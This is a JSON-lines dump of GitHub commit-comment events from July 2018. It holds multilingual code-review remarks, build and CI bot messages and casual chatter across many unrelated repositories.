{"id":"8010360559","type":"CommitCommentEvent","actor":{"login":"volkova229"},"repo":{"name":"hiki89/cars"},"payload":{"comment":{"id":29814717,"position":6,"line":25,"path":"routes/web.php","commit_id":"c3ecb5daac1124a87aa6849f5530121e8ff08a4b","created_at":"2018-07-24T13:58:03Z","updated_at":"2018-07-24T13:58:03Z","author_association":"NONE","body":"Nije gotovo :D"}},"created_at":"2018-07-24T13:58:03Z"}
{"id":"8010360758","type":"CommitCommentEvent","actor":{"login":"alisey"},"repo":{"name":"wix-incubator/ui-autotools"},"payload":{"comment":{"id":29814718,"position":14,"line":30,"path":"packages/a11y/package.json","commit_id":"9912700199c99a4c852c1460a7c974e9d4e05e39","created_at":"2018-07-24T13:58:05Z","updated_at":"2018-07-24T13:58:05Z","author_association":"COLLABORATOR","body":"Are you sure we need to bump these guys every time? `^` instructs npm to use the latest 1.x.x version, so this doesn't seem necessary."}},"created_at":"2018-07-24T13:58:05Z"}
{"id":"8010360909","type":"CommitCommentEvent","actor":{"login":"Starfua"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29814719,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T13:58:07Z","updated_at":"2018-07-24T13:58:07Z","author_association":"NONE","body":"best of luck guys"}},"created_at":"2018-07-24T13:58:07Z"}
{"id":"8010366036","type":"CommitCommentEvent","actor":{"login":"volkova229"},"repo":{"name":"hiki89/cars"},"payload":{"comment":{"id":29814739,"position":10,"line":1,"path":"resources/views/cars.blade.php","commit_id":"e2d1fbf6483d724e5e0e87b1534b6c27626bcdeb","created_at":"2018-07-24T13:58:51Z","updated_at":"2018-07-24T13:58:51Z","author_association":"NONE","body":"Ovaj fajl treba da extenduje `layouts.master`"}},"created_at":"2018-07-24T13:58:51Z"}
{"id":"8010366323","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"IvanRud95/Ivanrepository"},"payload":{"comment":{"id":29814742,"position":13,"line":13,"path":"02.rb","commit_id":"0229de03ea5af1c89a729467429edc71ed9ccd00","created_at":"2018-07-24T13:58:53Z","updated_at":"2018-07-24T13:58:53Z","author_association":"NONE","body":"рекомендуется давать переменным \"говорящие\" имена, чтобы впоследствии было проще читать и понимать код\r\nк примеру данные переменные можно было бы назвать `base` и `height`"}},"created_at":"2018-07-24T13:58:53Z"}
{"id":"8010366826","type":"CommitCommentEvent","actor":{"login":"volkova229"},"repo":{"name":"hiki89/cars"},"payload":{"comment":{"id":29814744,"position":11,"line":1,"path":"resources/views/show.blade.php","commit_id":"e2d1fbf6483d724e5e0e87b1534b6c27626bcdeb","created_at":"2018-07-24T13:58:59Z","updated_at":"2018-07-24T13:58:59Z","author_association":"NONE","body":"I ovde isto"}},"created_at":"2018-07-24T13:58:59Z"}
{"id":"8010368358","type":"CommitCommentEvent","actor":{"login":"benjaoming"},"repo":{"name":"learningequality/kolibri"},"payload":{"comment":{"id":29814749,"position":22,"line":22,"path":"windows_installer_docker_build/Dockerfile","commit_id":"d0a70308a701da114445fec81702c7757ed5a446","created_at":"2018-07-24T13:59:13Z","updated_at":"2018-07-24T13:59:13Z","author_association":"MEMBER","body":"@mrpau-richard I'm cleaning up this script and wondering what the above is doing.\r\n\r\nGiven `kolibri-0.11.0a3.dev0+git.8.g814a50e42-py2.py3-none-any.whl`, it will:\r\n\r\n1. Find the first occurrence of a * .whl files\r\n1. Strip the file name from any path components\r\n1. Remove the first 8 digits, `kolibri-`\r\n1. Remove the last 21 digits, `-py2.py3-none-any.whl`\r\n1. Assign `KOLIBRI_BUILD_VERSION=$WHL_FILE_VERSION`\r\n\r\nInstead of this, I will use just the `$KOLIBRI_VERSION`, since we have made changes such that it should align properly to PEP 440 and actually now matches the file name's version 100% :)"}},"created_at":"2018-07-24T13:59:13Z"}
{"id":"8010368979","type":"CommitCommentEvent","actor":{"login":"pmetzger"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29814753,"position":36,"line":36,"path":"net/mtxclient/Portfile","commit_id":"ba8db93756a3be2eb656c44b15db482107947a2a","created_at":"2018-07-24T13:59:18Z","updated_at":"2018-07-24T13:59:18Z","author_association":"MEMBER","body":"If you want to do that work, @ryandesign, that would be appreciated, but I don't think it's actually a good idea to force contributors of new packages to test their packages against libraries upstream doesn't support."}},"created_at":"2018-07-24T13:59:18Z"}
{"id":"8010370805","type":"CommitCommentEvent","actor":{"login":"fanich37"},"repo":{"name":"nLight/Memory-Game"},"payload":{"comment":{"id":29814759,"position":28,"line":28,"path":"src/helpers.js","commit_id":"7d6b314e8b7bd46bdf8a8dabdc0e5a35ac0f1301","created_at":"2018-07-24T13:59:35Z","updated_at":"2018-07-24T13:59:35Z","author_association":"NONE","body":"а на сколько вообще bad-practice просто скопировать состояние (не погружаясь вглубь, через Object.assign или ...), менять что-то и передавать этот объект в setState? По факту же выйдет, что состояние уже будет обновлено до вызова setState."}},"created_at":"2018-07-24T13:59:35Z"}
{"id":"8010377278","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"IvanRud95/Ivanrepository"},"payload":{"comment":{"id":29814800,"position":13,"line":13,"path":"02.rb","commit_id":"0229de03ea5af1c89a729467429edc71ed9ccd00","created_at":"2018-07-24T14:00:31Z","updated_at":"2018-07-24T14:00:31Z","author_association":"NONE","body":"использование однобуквенных переменных может быть оправданно разве что в случаях, когда эти названия диктует контекст задачи\r\nк примеру, если это коэффициэнты уравнения, произвольные стороны геометрической фигуры и т.п."}},"created_at":"2018-07-24T14:00:31Z"}
{"id":"8010379266","type":"CommitCommentEvent","actor":{"login":"FPTStardust"},"repo":{"name":"EllieZheng/personal-website"},"payload":{"comment":{"id":29814814,"position":null,"line":null,"path":null,"commit_id":"ec45d9c858c92e7dd4dab6e16ff3f675ecb7d3b7","created_at":"2018-07-24T14:00:48Z","updated_at":"2018-07-24T14:00:48Z","author_association":"NONE","body":"hao!"}},"created_at":"2018-07-24T14:00:48Z"}
{"id":"8010382329","type":"CommitCommentEvent","actor":{"login":"petereast"},"repo":{"name":"repositive/event-store"},"payload":{"comment":{"id":29814826,"position":3,"line":3,"path":"src/index.test.ts","commit_id":"d027c3f9ed52b505578d4f0bed279caab5ffed45","created_at":"2018-07-24T14:01:15Z","updated_at":"2018-07-24T14:01:15Z","author_association":"NONE","body":"@Istar-Eldritch you should use `test.todo(message)` for placeholder tests :)"}},"created_at":"2018-07-24T14:01:15Z"}
{"id":"8010386240","type":"CommitCommentEvent","actor":{"login":"svenseeberg"},"repo":{"name":"SUSE/doc-sle"},"payload":{"comment":{"id":29814835,"position":17,"line":61,"path":"xml/rmt_mirroring.xml","commit_id":"c0a7f13b09bf57c68d8f38dc6199217d5fd8a280","created_at":"2018-07-24T14:01:50Z","updated_at":"2018-07-24T14:01:50Z","author_association":"CONTRIBUTOR","body":"Thanks, changed that."}},"created_at":"2018-07-24T14:01:50Z"}
{"id":"8010390639","type":"CommitCommentEvent","actor":{"login":"Kulothungan8297"},"repo":{"name":"Kulothungan8297/Weather-Observation-Station-7"},"payload":{"comment":{"id":29814847,"position":null,"line":null,"path":null,"commit_id":"cf20754b9671ede5792791d5d381f7f92d228893","created_at":"2018-07-24T14:02:28Z","updated_at":"2018-07-24T14:02:28Z","author_association":"OWNER","body":"select distinct CITY from STATION where RIGHT(CITY,1) in ('A','E','I','O','U') ;"}},"created_at":"2018-07-24T14:02:28Z"}
{"id":"8010391752","type":"CommitCommentEvent","actor":{"login":"jesusbagpuss"},"repo":{"name":"eprints/eprints"},"payload":{"comment":{"id":29814849,"position":null,"line":null,"path":null,"commit_id":"e3e08522ff365c9953fa8dd60496cc4a3fb5abf7","created_at":"2018-07-24T14:02:38Z","updated_at":"2018-07-24T14:02:38Z","author_association":"CONTRIBUTOR","body":"@mpbraendle - they should be flagged as 'deleted' in the OAI-PMH set (meaning the metadata has been removed from the OAI interface; not the item has been deleted from the repository).\r\n\r\nTo flag them as being deleted in OAI, they need to be returned - hence this change.\r\n\r\nThe original pull request is here: https://github.com/eprints/eprints/pull/324\r\nbut it looks like the update to EPrints::OpenArchives was somehow not merged in?\r\nhttps://github.com/eprints/eprints/pull/324/commits/6b19298ee98f85fdf1e78ef253884c15fa21973a\r\n\r\nThis is obviously a critical part of the fix!\r\n\r\n"}},"created_at":"2018-07-24T14:02:38Z"}
{"id":"8010393965","type":"CommitCommentEvent","actor":{"login":"Kulothungan8297"},"repo":{"name":"Kulothungan8297/Weather-Observation-Station-7"},"payload":{"comment":{"id":29814852,"position":2,"line":2,"path":"README.md","commit_id":"cf20754b9671ede5792791d5d381f7f92d228893","created_at":"2018-07-24T14:02:58Z","updated_at":"2018-07-24T14:02:58Z","author_association":"OWNER","body":"select distinct CITY from STATION where RIGHT(CITY,1) in ('A','E','I','O','U') ;"}},"created_at":"2018-07-24T14:02:58Z"}
{"id":"8010395698","type":"CommitCommentEvent","actor":{"login":"desenvolvedorIcotrade"},"repo":{"name":"desenvolvedorIcotrade/WebServices"},"payload":{"comment":{"id":29814857,"position":null,"line":null,"path":null,"commit_id":"ee039c696922fc604e29c222b4739ba8823b8e66","created_at":"2018-07-24T14:03:14Z","updated_at":"2018-07-24T14:03:14Z","author_association":"OWNER","body":"### [****](url)\r\n- [https://accounts.inlocomedia.com/pt-BR/publishers/sign_up/90e10f98d755e9e5b260b2c7ad5225fb03ade68621e43205ff357a04b66024e4](url)"}},"created_at":"2018-07-24T14:03:14Z"}
{"id":"8010395919","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"IvanRud95/Ivanrepository"},"payload":{"comment":{"id":29814858,"position":14,"line":14,"path":"03.rb","commit_id":"2d445b2c402a4afaa88294c173972ae3bdcb9975","created_at":"2018-07-24T14:03:16Z","updated_at":"2018-07-24T14:03:16Z","author_association":"NONE","body":"в ТЗ: \"Также, если треугольник является при этом равнобедренным\"\r\nобрати внимание на \"Также\" - равнобедренность нужно проверять ТОЛЬКО, ЕСЛИ он прямоугольный, а у тебя она проверяется в любом случае - это нарушение ТЗ, надо исправлять (и для прямоугольного треугольника проверка сильно упростится)"}},"created_at":"2018-07-24T14:03:16Z"}
{"id":"8010396266","type":"CommitCommentEvent","actor":{"login":"desenvolvedorIcotrade"},"repo":{"name":"desenvolvedorIcotrade/WebServices"},"payload":{"comment":{"id":29814860,"position":4,"line":4,"path":"Links-patrocinados","commit_id":"ee039c696922fc604e29c222b4739ba8823b8e66","created_at":"2018-07-24T14:03:20Z","updated_at":"2018-07-24T14:03:20Z","author_association":"OWNER","body":"![2028e569dfda375456bc36172ab4cd5d](https://user-images.githubusercontent.com/35335846/43143426-1ea58372-8f31-11e8-90c3-77f9b06b13d7.gif)\r\n"}},"created_at":"2018-07-24T14:03:20Z"}
{"id":"8010398981","type":"CommitCommentEvent","actor":{"login":"Zombiefruit"},"repo":{"name":"wix-incubator/ui-autotools"},"payload":{"comment":{"id":29814867,"position":14,"line":30,"path":"packages/a11y/package.json","commit_id":"9912700199c99a4c852c1460a7c974e9d4e05e39","created_at":"2018-07-24T14:03:46Z","updated_at":"2018-07-24T14:03:46Z","author_association":"COLLABORATOR","body":"Oh yeah, it's lerna doing it automatically upon publishing. It's unnecessary. There's probably some configuration that will prevent it from doing so."}},"created_at":"2018-07-24T14:03:46Z"}
{"id":"8010399486","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"IvanRud95/Ivanrepository"},"payload":{"comment":{"id":29814869,"position":22,"line":22,"path":"03.rb","commit_id":"2d445b2c402a4afaa88294c173972ae3bdcb9975","created_at":"2018-07-24T14:03:50Z","updated_at":"2018-07-24T14:03:50Z","author_association":"NONE","body":"ненужная пустая строка"}},"created_at":"2018-07-24T14:03:50Z"}
{"id":"8010400912","type":"CommitCommentEvent","actor":{"login":"sungkuk5420"},"repo":{"name":"sungkuk5420/CarRepairShopApp"},"payload":{"comment":{"id":29814873,"position":12,"line":130,"path":"public/stylesheets/main.css","commit_id":"2fd42aa6cf603e5c88777fc647c0f0e1fd293be2","created_at":"2018-07-24T14:04:03Z","updated_at":"2018-07-24T14:04:03Z","author_association":"OWNER","body":"@syg1138 \r\n여기 아이템 1,2,3은 공통된 클래스 아이템으로 변경\r\n후에 position은 absolute에서 relative로 변경"}},"created_at":"2018-07-24T14:04:03Z"}
{"id":"8010400953","type":"CommitCommentEvent","actor":{"login":"dreyling"},"repo":{"name":"eudaq/eudaq"},"payload":{"comment":{"id":29814874,"position":null,"line":null,"path":null,"commit_id":"dfad754c4466c29652148bb40e4f8ce351bb3b9c","created_at":"2018-07-24T14:04:03Z","updated_at":"2018-07-24T14:04:03Z","author_association":"MEMBER","body":"That was not the issue, but: There is already a find package methof for ROOT, which makes findROOT obsolete."}},"created_at":"2018-07-24T14:04:03Z"}
{"id":"8010402188","type":"CommitCommentEvent","actor":{"login":"ChalapathiRevanth"},"repo":{"name":"ChalapathiRevanth/device_xiaomi_rosy"},"payload":{"comment":{"id":29814878,"position":null,"line":null,"path":null,"commit_id":"6e051ee260638c2414813d6da2e725c8679f3b6a","created_at":"2018-07-24T14:04:14Z","updated_at":"2018-07-24T14:04:14Z","author_association":"OWNER","body":"After some tests Bought Fingerprint Working On FPC Devices! And there is RIL Bug Present! \r\n"}},"created_at":"2018-07-24T14:04:14Z"}
{"id":"8010403624","type":"CommitCommentEvent","actor":{"login":"honux77"},"repo":{"name":"daesoop/cs-level1"},"payload":{"comment":{"id":29814883,"position":null,"line":null,"path":null,"commit_id":"a402ca48c8369d0f89ee64f7217e897276125f6b","created_at":"2018-07-24T14:04:27Z","updated_at":"2018-07-24T14:04:27Z","author_association":"NONE","body":"이 커밋 조금 이상하네요? "}},"created_at":"2018-07-24T14:04:27Z"}
{"id":"8010404143","type":"CommitCommentEvent","actor":{"login":"jesusbagpuss"},"repo":{"name":"eprints/eprints"},"payload":{"comment":{"id":29814884,"position":null,"line":null,"path":null,"commit_id":"e3e08522ff365c9953fa8dd60496cc4a3fb5abf7","created_at":"2018-07-24T14:04:32Z","updated_at":"2018-07-24T14:04:32Z","author_association":"CONTRIBUTOR","body":"Actually, in 3.3.16, it is there:\r\nhttps://github.com/eprints/eprints/blob/v3.3.16/perl_lib/EPrints/OpenArchives.pm#L94 and\r\nhttps://github.com/eprints/eprints/blob/v3.3.16/perl_lib/EPrints/OpenArchives.pm#L178\r\n"}},"created_at":"2018-07-24T14:04:32Z"}
{"id":"8010405037","type":"CommitCommentEvent","actor":{"login":"georgemillo"},"repo":{"name":"dradis/dradis-ce"},"payload":{"comment":{"id":29814885,"position":null,"line":null,"path":null,"commit_id":"e38d67343d9797cafa848e2d50ecde30068e9048","created_at":"2018-07-24T14:04:41Z","updated_at":"2018-07-24T14:04:41Z","author_association":"CONTRIBUTOR","body":"Are we sure this is the right move? The [ActionCable guides](https://edgeguides.rubyonrails.org/action_cable_overview.html#subscription-adapter) explicitly say that \"the async adapter... should not be used in production.\"\r\n\r\nWhat's the reasoning behind not using redis?"}},"created_at":"2018-07-24T14:04:41Z"}
{"id":"8010406635","type":"CommitCommentEvent","actor":{"login":"sungkuk5420"},"repo":{"name":"sungkuk5420/CarRepairShopApp"},"payload":{"comment":{"id":29814889,"position":null,"line":null,"path":null,"commit_id":"2fd42aa6cf603e5c88777fc647c0f0e1fd293be2","created_at":"2018-07-24T14:04:55Z","updated_at":"2018-07-24T14:04:55Z","author_association":"OWNER","body":"@syg1138 윤기야 리뷰했어"}},"created_at":"2018-07-24T14:04:55Z"}
{"id":"8010407917","type":"CommitCommentEvent","actor":{"login":"alisey"},"repo":{"name":"wix-incubator/ui-autotools"},"payload":{"comment":{"id":29814890,"position":14,"line":30,"path":"packages/a11y/package.json","commit_id":"9912700199c99a4c852c1460a7c974e9d4e05e39","created_at":"2018-07-24T14:05:08Z","updated_at":"2018-07-24T14:05:08Z","author_association":"COLLABORATOR","body":"Ah, if it happens automatically then fine. I thought you had to update those numbers manually."}},"created_at":"2018-07-24T14:05:08Z"}
{"id":"8010408720","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"IvanRud95/Ivanrepository"},"payload":{"comment":{"id":29814891,"position":4,"line":4,"path":"03.rb","commit_id":"2d445b2c402a4afaa88294c173972ae3bdcb9975","created_at":"2018-07-24T14:05:15Z","updated_at":"2018-07-24T14:05:15Z","author_association":"NONE","body":"про ненужность \"чопмпов\" уже писал"}},"created_at":"2018-07-24T14:05:15Z"}
{"id":"8010413383","type":"CommitCommentEvent","actor":{"login":"Zombiefruit"},"repo":{"name":"wix-incubator/ui-autotools"},"payload":{"comment":{"id":29814899,"position":14,"line":30,"path":"packages/a11y/package.json","commit_id":"9912700199c99a4c852c1460a7c974e9d4e05e39","created_at":"2018-07-24T14:05:58Z","updated_at":"2018-07-24T14:05:58Z","author_association":"COLLABORATOR","body":"God no :) "}},"created_at":"2018-07-24T14:05:58Z"}
{"id":"8010415562","type":"CommitCommentEvent","actor":{"login":"richyumul"},"repo":{"name":"richyumul/toys-for-joy"},"payload":{"comment":{"id":29814904,"position":null,"line":null,"path":null,"commit_id":"4a12903d891cac264ad33be60712ac143be6824b","created_at":"2018-07-24T14:06:18Z","updated_at":"2018-07-24T14:06:18Z","author_association":"OWNER","body":"Created multidev environment [toys-for-joy#ci-35](https://dashboard.pantheon.io/sites/255bbf5d-2830-4fba-8604-186a8110e36d#ci-35).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-35-toys-for-joy.pantheonsite.io/)"}},"created_at":"2018-07-24T14:06:18Z"}
{"id":"8010418771","type":"CommitCommentEvent","actor":{"login":"ChalapathiRevanth"},"repo":{"name":"ChalapathiRevanth/device_xiaomi_rosy"},"payload":{"comment":{"id":29814911,"position":null,"line":null,"path":null,"commit_id":"6e051ee260638c2414813d6da2e725c8679f3b6a","created_at":"2018-07-24T14:06:47Z","updated_at":"2018-07-24T14:06:47Z","author_association":"OWNER","body":"@SubDragonzj  @ChalapathiRevanth Lets Talk Here,if u need more"}},"created_at":"2018-07-24T14:06:47Z"}
{"id":"8010420022","type":"CommitCommentEvent","actor":{"login":"Kalaborative"},"repo":{"name":"Kalaborative/survivio-cheat"},"payload":{"comment":{"id":29814918,"position":null,"line":null,"path":null,"commit_id":"b825692926898a66b945b55ea1e59f4c13718e60","created_at":"2018-07-24T14:06:58Z","updated_at":"2018-07-24T14:06:58Z","author_association":"OWNER","body":"#1 "}},"created_at":"2018-07-24T14:06:58Z"}
{"id":"8010423411","type":"CommitCommentEvent","actor":{"login":"quelhasu"},"repo":{"name":"ThomasPericoi/PausePipi"},"payload":{"comment":{"id":29814924,"position":35,"line":56,"path":"css/main.css","commit_id":"91c067f7e16ad1cdf7c581b8d4f9341c393cc934","created_at":"2018-07-24T14:07:29Z","updated_at":"2018-07-24T14:07:29Z","author_association":"COLLABORATOR","body":"incroybale modif"}},"created_at":"2018-07-24T14:07:29Z"}
{"id":"8010425945","type":"CommitCommentEvent","actor":{"login":"quelhasu"},"repo":{"name":"ThomasPericoi/PausePipi"},"payload":{"comment":{"id":29814928,"position":5,"line":45,"path":"index.html","commit_id":"91c067f7e16ad1cdf7c581b8d4f9341c393cc934","created_at":"2018-07-24T14:07:52Z","updated_at":"2018-07-24T14:07:52Z","author_association":"COLLABORATOR","body":"celui-ci c'est le meilleur"}},"created_at":"2018-07-24T14:07:52Z"}
{"id":"8010427332","type":"CommitCommentEvent","actor":{"login":"batpigandme"},"repo":{"name":"jimhester/tidyversedashboard"},"payload":{"comment":{"id":29814931,"position":null,"line":null,"path":null,"commit_id":"f6bfa5d650dbfb4bcbeeba7d2936715d899a3b29","created_at":"2018-07-24T14:08:06Z","updated_at":"2018-07-24T14:08:06Z","author_association":"NONE","body":"[-c°▥°]-c"}},"created_at":"2018-07-24T14:08:06Z"}
{"id":"8010430056","type":"CommitCommentEvent","actor":{"login":"quelhasu"},"repo":{"name":"ThomasPericoi/PausePipi"},"payload":{"comment":{"id":29814935,"position":37,"line":349,"path":"js/main.js","commit_id":"6a6945f99705f7c236294dafbec35f55f6994062","created_at":"2018-07-24T14:08:30Z","updated_at":"2018-07-24T14:08:30Z","author_association":"COLLABORATOR","body":"😂😂😂😂😂"}},"created_at":"2018-07-24T14:08:30Z"}
{"id":"8010435164","type":"CommitCommentEvent","actor":{"login":"jhenin"},"repo":{"name":"Colvars/colvars"},"payload":{"comment":{"id":29814942,"position":null,"line":null,"path":null,"commit_id":"acdf3228bc9439df108fad935cd6c20d06a0b526","created_at":"2018-07-24T14:09:17Z","updated_at":"2018-07-24T14:09:17Z","author_association":"MEMBER","body":"Actually this was motivated by another use case, brought by another user. I'd add the case to the top-level tests directory, but for now those tests are generic and don't assume a PDB parser - the use case we're talking about is PDB only. Can I isolate the PDB case somehow, or should it go into NAMD/VMD tests?"}},"created_at":"2018-07-24T14:09:17Z"}
{"id":"8010446407","type":"CommitCommentEvent","actor":{"login":"niazim3"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29814960,"position":6,"line":22,"path":"code/drasil-lang/Language/Drasil/Printing/LayoutObj.hs","commit_id":"c775812d0e354286d65706b405e7bbb5076b08d2","created_at":"2018-07-24T14:11:00Z","updated_at":"2018-07-24T14:11:00Z","author_association":"COLLABORATOR","body":"Makes sense, a comment related to that was made in issue #903."}},"created_at":"2018-07-24T14:11:00Z"}
{"id":"8010451131","type":"CommitCommentEvent","actor":{"login":"sunod"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29814967,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T14:11:44Z","updated_at":"2018-07-24T14:11:44Z","author_association":"NONE","body":"Good "}},"created_at":"2018-07-24T14:11:44Z"}
{"id":"8010462800","type":"CommitCommentEvent","actor":{"login":"ThomasPericoi"},"repo":{"name":"ThomasPericoi/PausePipi"},"payload":{"comment":{"id":29814984,"position":551,"line":319,"path":"js/main.js","commit_id":"2deab2d01804a8639320aeca464fbd0379a78c9e","created_at":"2018-07-24T14:13:31Z","updated_at":"2018-07-24T14:13:31Z","author_association":"OWNER","body":"Nique ta mère"}},"created_at":"2018-07-24T14:13:31Z"}
{"id":"8010464463","type":"CommitCommentEvent","actor":{"login":"mpbraendle"},"repo":{"name":"eprints/eprints"},"payload":{"comment":{"id":29814987,"position":null,"line":null,"path":null,"commit_id":"e3e08522ff365c9953fa8dd60496cc4a3fb5abf7","created_at":"2018-07-24T14:13:44Z","updated_at":"2018-07-24T14:13:44Z","author_association":"CONTRIBUTOR","body":"Thanks. That makes it all clear. We took over the patch in OpenArchives.pm , so that is fine."}},"created_at":"2018-07-24T14:13:44Z"}
{"id":"8010467746","type":"CommitCommentEvent","actor":{"login":"toywei"},"repo":{"name":"toywei/tidb"},"payload":{"comment":{"id":29814988,"position":null,"line":null,"path":null,"commit_id":"6663f6353413aaf0306697e53f3b4dc7244753ce","created_at":"2018-07-24T14:14:15Z","updated_at":"2018-07-24T14:14:15Z","author_association":"OWNER","body":"err = checkAddPartitionTooManyPartitions(len(tblInfo.Partition.Definitions) + len(partInfo.Definitions))"}},"created_at":"2018-07-24T14:14:15Z"}
{"id":"8010470157","type":"CommitCommentEvent","actor":{"login":"Lexuanduy"},"repo":{"name":"Lexuanduy/Assignment-Laravel-T1708E"},"payload":{"comment":{"id":29814989,"position":null,"line":null,"path":null,"commit_id":"38b928c2379d6d17901992e9c9a17c41e64cf7cd","created_at":"2018-07-24T14:14:36Z","updated_at":"2018-07-24T14:14:36Z","author_association":"OWNER","body":"aaa"}},"created_at":"2018-07-24T14:14:36Z"}
{"id":"8010470361","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29814990,"position":null,"line":null,"path":null,"commit_id":"584f36882d0c14bf45f90dd115ba0559428ab34e","created_at":"2018-07-24T14:14:38Z","updated_at":"2018-07-24T14:14:38Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-24T14:14:38Z"}
{"id":"8010470881","type":"CommitCommentEvent","actor":{"login":"Lexuanduy"},"repo":{"name":"Lexuanduy/Assignment-Laravel-T1708E"},"payload":{"comment":{"id":29814991,"position":null,"line":null,"path":null,"commit_id":"38b928c2379d6d17901992e9c9a17c41e64cf7cd","created_at":"2018-07-24T14:14:43Z","updated_at":"2018-07-24T14:14:43Z","author_association":"OWNER","body":"ok\r\n"}},"created_at":"2018-07-24T14:14:43Z"}
{"id":"8010471462","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29814993,"position":null,"line":null,"path":null,"commit_id":"918491f346e74e300608fab47d2dafedabc458db","created_at":"2018-07-24T14:14:48Z","updated_at":"2018-07-24T14:14:48Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-360](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-360).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-360-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-24T14:14:48Z"}
{"id":"8010472240","type":"CommitCommentEvent","actor":{"login":"rootsco"},"repo":{"name":"makingsensetraining/DirectlyTraining"},"payload":{"comment":{"id":29814995,"position":1,"line":1,"path":"webapp/app/components/pages/ActionButtons/ModalBody.jsx","commit_id":"b2fbe723d1baf1ce969bb09a20a0ac0c36cb0122","created_at":"2018-07-24T14:14:56Z","updated_at":"2018-07-24T14:14:56Z","author_association":"COLLABORATOR","body":"this component's test appears to be missing"}},"created_at":"2018-07-24T14:14:56Z"}
{"id":"8010473018","type":"CommitCommentEvent","actor":{"login":"toywei"},"repo":{"name":"toywei/tidb"},"payload":{"comment":{"id":29814998,"position":17,"line":427,"path":"ddl/table.go","commit_id":"6663f6353413aaf0306697e53f3b4dc7244753ce","created_at":"2018-07-24T14:15:03Z","updated_at":"2018-07-24T14:15:03Z","author_association":"OWNER","body":"log"}},"created_at":"2018-07-24T14:15:03Z"}
{"id":"8010474906","type":"CommitCommentEvent","actor":{"login":"jdalrymple"},"repo":{"name":"jdalrymple/node-gitlab"},"payload":{"comment":{"id":29815005,"position":null,"line":null,"path":null,"commit_id":"f4f1aeefd1d3bb2d400dbc12cc570278c45ba63e","created_at":"2018-07-24T14:15:19Z","updated_at":"2018-07-24T14:15:19Z","author_association":"OWNER","body":"Testing locally i see it was returning because it was getting a html redirect. Need to figure out why that is happening\r\n"}},"created_at":"2018-07-24T14:15:19Z"}
{"id":"8010476579","type":"CommitCommentEvent","actor":{"login":"joshtynjala"},"repo":{"name":"apache/royale-compiler"},"payload":{"comment":{"id":29815008,"position":null,"line":null,"path":null,"commit_id":"50310050f62d741d3ce4a4aab06e07eb9c2610bf","created_at":"2018-07-24T14:15:34Z","updated_at":"2018-07-24T14:15:34Z","author_association":"CONTRIBUTOR","body":"This commit will break my VSCode extension, which creates a new implementation of IASDocComment. You should probably use that interface here instead of the ASDocComment class. Or wrap the code with instanceof ASDocComment."}},"created_at":"2018-07-24T14:15:34Z"}
{"id":"8010478579","type":"CommitCommentEvent","actor":{"login":"fche"},"repo":{"name":"flightaware/dump1090"},"payload":{"comment":{"id":29815012,"position":null,"line":null,"path":null,"commit_id":"1caabc5ad874c539721bd675d6304aa5e03397a2","created_at":"2018-07-24T14:15:52Z","updated_at":"2018-07-24T14:15:52Z","author_association":"NONE","body":"BTW it's not obvious where the regenerated data is coming from.  Reading README.aircraft-db, it sounds like you're inviting people to submit changes against the vrs.csv* file, but I see no pull requests or such against it."}},"created_at":"2018-07-24T14:15:52Z"}
{"id":"8010481400","type":"CommitCommentEvent","actor":{"login":"jorgegonzalez"},"repo":{"name":"jorgegonzalez/zoe"},"payload":{"comment":{"id":29815023,"position":null,"line":null,"path":null,"commit_id":"71a1d9e5586ddd6475e4abf356c49852a0a9407a","created_at":"2018-07-24T14:16:18Z","updated_at":"2018-07-24T14:16:18Z","author_association":"OWNER","body":"I fixed it. `package.json#bin` was wrong."}},"created_at":"2018-07-24T14:16:18Z"}
{"id":"8010483033","type":"CommitCommentEvent","actor":{"login":"wizhippo"},"repo":{"name":"ezsystems/ezplatform"},"payload":{"comment":{"id":29815025,"position":16,"line":49,"path":"app/config/default_parameters.yml","commit_id":"81a0c6862c005a4f4e10f7b39ebf168962f8c948","created_at":"2018-07-24T14:16:32Z","updated_at":"2018-07-24T14:16:32Z","author_association":"CONTRIBUTOR","body":"Is this intentional to add the `Recommendation Bundle`?  Not sure how it is related to sessions."}},"created_at":"2018-07-24T14:16:32Z"}
